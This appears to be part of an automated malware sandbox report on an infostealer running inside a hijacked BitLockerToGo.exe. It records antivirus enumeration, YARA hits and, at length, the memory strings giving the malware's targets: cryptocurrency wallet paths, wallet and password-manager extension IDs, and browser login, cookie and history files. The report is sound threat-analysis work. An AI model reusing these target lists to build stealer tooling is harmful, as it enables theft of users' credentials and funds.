                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0090B5EE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0090FDEF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0090CD14
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_00908D1C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0090CEA3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0090CE00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0090A644
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0090CE67
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,3_2_0090FF24
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F38A6 GetSystemTime,3_2_008F38A6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F28AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_008F28AF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F298A GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_008F298A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.91ecc0.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.**2
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass 
Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wallet|1|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Frontier Wallet|1|kppfdiipphfccemcignhifpjkapfbihd|1|0|0|SafePal|1|lgmpcpglpngdoalbgeoldeajfclnhafa|1|0|0|SubWallet - Polkadot Wallet|1|onhogfjeacnfoofkfgppdlbmlmnplgbn|1|0|0|Fluvi Wallet|1|mmmjbcfofconkannjonfmjjajpllddbg|1|0|0|Glass Wallet - Sui Wallet|1|loinekcabhlmhjjbocijdoimmejangoa|1|0|0|Morphis Wallet|1|heefohaffomkkkphnlpohglngmbcclhi|1|0|0|Xverse Wallet|1|idnnbdplmphpflfnlkomgpfbpcgelopg|1|0|0|Compass Wallet for Sei|1|anokgmphncpekkhclmingpimjmcooifb|1|0|0|HAVAH Wallet|1|cnncmdhjacpkmjmkcafchppbnpnhdmon|1|0|0|Elli - Sui Wallet|1|ocjdpmoallmgmjbbogfiiaofphbjgchh|1|0|0|Venom Wallet|1|ojggmchlghnjlapmfbnjholfjkiidbch|1|0|0|Pulse Wallet Chromium|1|ciojocpkclfflombbcfigcijjcbkmhaf|1|0|0|Magic Eden Wal
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp*n
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ata\Roaming\Ledger Live\*.*\
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.**2
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
